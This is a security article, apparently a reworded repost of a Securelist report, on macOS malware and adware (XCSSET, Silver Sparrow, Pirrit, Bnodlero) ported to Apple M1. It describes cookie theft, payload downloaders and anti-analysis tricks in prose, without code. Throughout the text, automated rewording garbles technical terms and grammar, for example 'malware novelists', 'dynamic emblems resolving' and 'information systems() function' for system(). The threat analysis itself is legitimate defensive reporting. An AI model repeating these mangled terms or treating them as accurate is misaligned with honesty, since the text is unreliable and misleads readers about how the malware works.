Introduction

A short while ago, Apple released Mac computers with the new microchip called Apple M1. The unexpected release was a milestone in the Apple hardware industry. However, as technology evolves, we likewise observe a growing interest in the freshly released platform from malware adversaries. This inevitably leads us to new malware samples compiled for the Apple Silicon platform. In this article, we are going to take a look at menaces for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q. part at the end of the article for those who want to understand better the security risks of M1 malware. Let’s dive in.

XCSSET malware

Last year, security threats called XCSSET was discovered for the first time. It targets mainly Mac developers using a unique style of distribution: injecting a malicious warhead into Xcode IDE projects on the victim’s Mac. This warhead will be executed at the time of building project files in Xcode. XCSSET modules have numerous abilities, such as 😛 TAGEND

Reading and dumping Safari cookies, Injecting malicious JavaScript code into various websites, Stealing user files and info from applications, such as Notes, WeChat, Skype, Telegram, etc ., Encrypting customer files.

All these various features, in combination with high stealth and an unusual lane of distribution, attain XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found out that some of them likewise contained samples compiled specially for new Apple Silicon chips. For instance, a sample with the MD5 hash sum 914e49921c19fffd7443deee6ee161a4 contains two architectures: x86_64 and ARM6 4.

The first one corresponds to previous-generation, Intel-based Mac computers, but the second one is compiled for ARM6 4 architecture, which means that it can run on computers with the new Apple M1 microchip. According to VirusTotal, this sample was first uploaded on 2021 -0 2-24 21:06: 05 and the original research report did not contain this hash or a module named “metald”, the name of the executable file. With this information on hand, we can assume that the XCSSET campaign is probably still ongoing. This leads us to the thought that more and more malware novelists are actively recompiling their samples to have an opportunity to run on new Apple Silicon Macs natively.

Silver Sparrow threat

XCSSET is not the only family which has adapted to run natively on Apple Silicon. According to a RedCanary report, a new threat called Silver Sparrow has been identified. This threat introduces a new route for malware novelists to abuse the default packaging functionality: instead of placing a malicious payload in preinstall or postinstall scripts, malware writers hid one in the Distribution XML file.

This payload uses JavaScript API to run bash commands in order to download a JSON configuration file.

Downloading of JSON config

And after successfully downloading that configuration file, the sample extracts a URL from the downloadURL field for the next download.

Downloading and executing a payload

Also, an appropriate Launch Agent is created for persistent execution of the malicious sample.

Malware persistence

This JavaScript payload can be executed regardless of chip architecture, but in the package file with the MD5 hash sum fdd6fb 2b1dfe07b0e57d4cbfef9c8149, there is a ” fat ” Mach-O containing two supported architectures( ARM6 4 and x86_64 ), as compared to the old bundle with the MD5 hash sum 30c9bc7d40454e501c358f77449071aa. This meant that the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.

Adware threats for the new platform

However, there are not just malware samples that can be launched on Apple Silicon. A known Mac malware researcher Patrick Wardle recently published a post covering Pirrit adware. Though it is an old and well-known adware family, it is still actively updated by their authors and new samples are encountered in the wild quite often.

These updates include 😛 TAGEND

Anti-debug techniques such as applying ptrace syscall with a PT_DENY_ATTACH flag, Control flow obfuscation techniques, Dynamic importations with dlsym calls to avoid static analysis, Virtual machine detection anti-analysis.

Control flow obfuscation; dynamic emblems resolving with dlsym

Besides these improvements in regular Intel x8 6_64 samples, new ARM6 4 samples were introduced. These are crafted specifically for the Apple Silicon M1 chip, but the consequences of running these are roughly the same: launching Pirrit adware outcomes in pop-ups, banners and various annoying advertisings displayed on the victim’s Mac.

Pirrit is not the only adware household to have begun supporting the Apple Silicon platform recently. For example, we likewise observed an ARM6 4 Bnodlero adware sample( MD5 82e02c1ca8dfb4c60ee98dc877ce77c5 ), which operates a bash downloader script applying information systems() function.

Bash downloader carried out by Bnodlero sample

Frequently Asked Questions

What is so special about M1 threats?

Well, there is not much special about them, frankly speaking. The only thing that distinguishes the new Apple M1 menaces from previous ones targeting Intel-based Mac computers is the architecture of the Mac processor for which the executable is compiled. In order to better to get their applications to run on Apple Silicon, software developers should recompile their code into executables which can run on the M1 chip. The same is true for malware adversaries.

Is Apple M1 chip least secure than Intel ones?

No, it is just a matter of platform supporting in malware executables.

Are Intel-based Macs was influenced by M1 threats?

Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be natively executed on the Intel x8 6_64 architecture. On the other hand, malicious samples are often put forward in so-called ” fat” Mach-O, which usually contains the same code but is compiled for several architectures. This means that running this “fat” executable will result in launching the right malicious code depending on your platform architecture. Pirrit and Bnodlero samples are great examples of this approach.

Can threats for Intel-based Macs run on Apple M1?

Yes, they can. Due to the Rosetta 2 feature, newly liberated Mac computers with Apple M1 are also welcome to operate malicious code written exclusively for Intel x8 6_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to their proprietary chips.

Is there an upward trend in M1 malware?

Yes, there certainly is, and it is absolutely to be expected. As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.

Conclusion

With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM6 4 architecture.

We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious bundles, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin accommodating their code for running on Apple M1 chips.

Read more: securelist.com